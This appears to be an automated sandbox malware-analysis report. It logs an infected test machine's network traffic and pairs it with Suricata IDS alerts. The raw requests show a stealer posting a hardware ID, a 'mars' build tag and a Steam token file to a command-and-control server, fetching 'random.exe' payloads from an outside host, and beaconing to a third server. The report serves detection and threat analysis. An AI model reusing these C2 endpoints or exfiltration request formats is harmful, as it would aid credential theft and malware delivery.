Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 2d 2d 0d 0a Data Ascii: ------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="file"------ECBGCGCGIEGCBFHIIEBF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJECFIECBGDGCAAAEHIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 2d 2d 0d 0a Data Ascii: ------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="message"ybncbhylepme------JJJECFIECBGDGCAAAEHI--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIIIIEHCFIECAKFHJDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 2d 2d 0d 0a Data Ascii: ------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDHIIIIEHCFIECAKFHJD--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 35 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005502001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 35 30 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005503001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 46 32 42 32 41 45 30 32 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="hwid"B6F2B2AE02294266498721------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="build"mars------HIDAKFIJJKJJJKEBKJEH--
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Mon, 11 Nov 2024 09:18:03 GMTIf-None-Match: "6731cbcb-1c2800"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 35 30 34 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005504031&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 46 32 42 32 41 45 30 32 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 2d 2d 0d 0a Data Ascii: ------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="hwid"B6F2B2AE02294266498721------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="build"mars------JDGHIIJKEBGIDHIDBKJD--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 35 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005505001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 46 32 42 32 41 45 30 32 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="hwid"B6F2B2AE02294266498721------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="build"mars------CFHDHIJDGCBAKFIEGHCB--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 46 32 42 32 41 45 30 32 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 2d 2d 0d 0a Data Ascii: ------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="hwid"B6F2B2AE02294266498721------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="build"mars------HCFCFHJDBKJKEBFHJEHI--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBKJECFCFBFIECBKFBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 46 32 42 32 41 45 30 32 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 2d 2d 0d 0a Data Ascii: ------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="hwid"B6F2B2AE02294266498721------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="build"mars------IIEBKJECFCFBFIECBKFB--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49747 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49908 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50122 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50124 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50126 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50125 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50127 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50128 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50135 -> 188.114.96.3:443
